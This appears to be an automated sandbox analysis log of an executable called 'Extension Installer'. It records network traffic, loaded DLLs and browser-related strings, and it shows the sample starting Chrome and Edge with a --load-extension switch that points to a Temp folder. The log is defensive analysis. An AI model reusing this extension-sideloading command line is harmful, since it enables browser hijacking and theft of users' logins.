Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.24.81:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.24.82:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F1C6600_2_00007FF848F1C660
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F104800_2_00007FF848F10480
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F1AED50_2_00007FF848F1AED5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F14F110_2_00007FF848F14F11
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F113880_2_00007FF848F11388
Source: file.exeStatic PE information: No import functions for PE file found
Source: file.exe, 00000000.00000002.2120395777.000002017BA36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.2074082038.000002017B7F0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameExtension Installer.exeH vs file.exe
Source: file.exeBinary or memory string: OriginalFilenameExtension Installer.exeH vs file.exe
Source: classification engineClassification label: mal48.winEXE@75/259@38/13
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
Source: C:\Users\user\Desktop\file.exeMutant created: NULL
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\ExtensionJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Program Files\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeVirustotal: Detection: 13%
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1996,i,9500446776372737509,2397503758829170713,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,15131329549635077134,11968698142116622703,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7000 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7024 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=1996,i,9500446776372737509,2397503758829170713,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2096,i,15131329549635077134,11968698142116622703,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7000 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7036 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7024 --field-trial-handle=1984,i,15182275219766818675,1864699790907549703,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: Google Chrome.lnk.0.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Chrome.lnk0.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Chrome.lnk1.0.drLNK file: ..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Chrome.lnk2.0.drLNK file: ..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Microsoft Edge.lnk.0.drLNK file: ..\..\..\..\..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: Microsoft Edge.lnk0.0.drLNK file: ..\..\..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: Google Drive.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\weckb\source\repos\Extension Installer\Extension Installer\obj\x64\Release\Extension Installer.pdb source: file.exe
Source: file.exeStatic PE information: 0xB5D63D96 [Fri Sep 3 05:16:06 2066 UTC]
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F2227A push ebp; ret 0_2_00007FF848F22280
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F17963 push ebx; retf 0_2_00007FF848F1796A
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeMemory allocated: 2017BA20000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\file.exeMemory allocated: 2017D5F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1200Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Web Data.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Web Data.7.drBinary or memory string: discord.comVMware20,11696428655f
Source: Web Data.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.7.drBinary or memory string: global block list test formVMware20,11696428655
Source: Web Data.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Web Data.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Web Data.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Web Data.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Web Data.7.drBinary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Web Data.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
